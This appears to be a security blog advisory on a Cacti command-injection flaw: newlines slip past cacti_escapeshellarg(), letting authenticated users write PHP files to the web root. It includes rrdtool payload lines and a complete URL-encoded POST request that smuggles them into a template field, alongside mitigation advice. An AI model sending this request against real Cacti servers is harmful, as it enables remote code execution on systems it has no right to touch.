Cacti Vulnerability Allows Remote Code Execution Through Graph Creation
Cacti Vulnerability Allows Remote Code Execution Through Graph Creation

Cacti Vulnerability Allows Remote Code Execution Through Graph Creation

A significant security vulnerability exists in Cacti, a popular network monitoring tool. This flaw allows authenticated users to exploit the graph creation and template functionalities, potentially leading to the execution of arbitrary PHP scripts within the application’s web root.

Affected Cacti Versions

  • Package: Cacti (PHP)
  • Affected Versions: <= 1.2.28
  • Patched Version: 1.2.29

Technical Overview

Cacti uses the rrdtool binary to generate graphs and images from Round Robin Databases (RRDs). Additionally, users can manipulate various settings through the web interface, especially during graph creation or when modifying graph templates. However, the method for sanitizing user inputs is inadequate. As a result, this creates an opportunity for command injection attacks.

Flaw in Input Sanitization

The function cacti_escapeshellarg() aims to sanitize user inputs by escaping shell metacharacters. Unfortunately, it fails to handle newline characters properly. Consequently, attackers can inject multiple commands into a single payload. This vulnerability allows them to execute unintended commands.

For instance, an attacker can craft a payload that creates a new RRD database and generates a PHP file containing malicious code:

CodeCopy Codecreate my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
graph xxx2.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:<?=phpinfo();?>

Exploitation Methodology

To exploit this vulnerability, an attacker injects a malicious payload by leveraging the graph creation or template functionality. When the system processes this payload during the invocation of the rrdtool binary, it creates a PHP file in the web root. Subsequently, attackers can access this file to run arbitrary code.

Example of Exploitation

Here is an example of a POST request that triggers this vulnerability:

POST http://<target-ip>/cacti/graph_templates.php?header=false HTTP/1.1
Host: <target-ip>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
...
right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A

When executed, this payload creates a file named xxx2.php in the web root. Consequently, attackers can access this file to execute the embedded PHP code.

Potential Impact

The ability to write arbitrary PHP scripts to the web root poses severe security risks, including remote code execution. Since authenticated users can exploit this vulnerability, organizations using Cacti must take immediate action to mitigate the associated risks.

Recommended Mitigation Measures

  1. Update Cacti: Ensure you run the latest version of Cacti (1.2.29 or later) to address this vulnerability.
  2. Limit User Permissions: Restrict authenticated users’ permissions to prevent unauthorized access to sensitive functionalities.
  3. Enhance Input Validation: Implement stricter input validation and sanitization measures to thwart command injection attacks.
  4. Monitor Server Logs: Regularly review server logs for suspicious activity that may indicate attempts to exploit this vulnerability.

Check our cyber security category

Tags

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *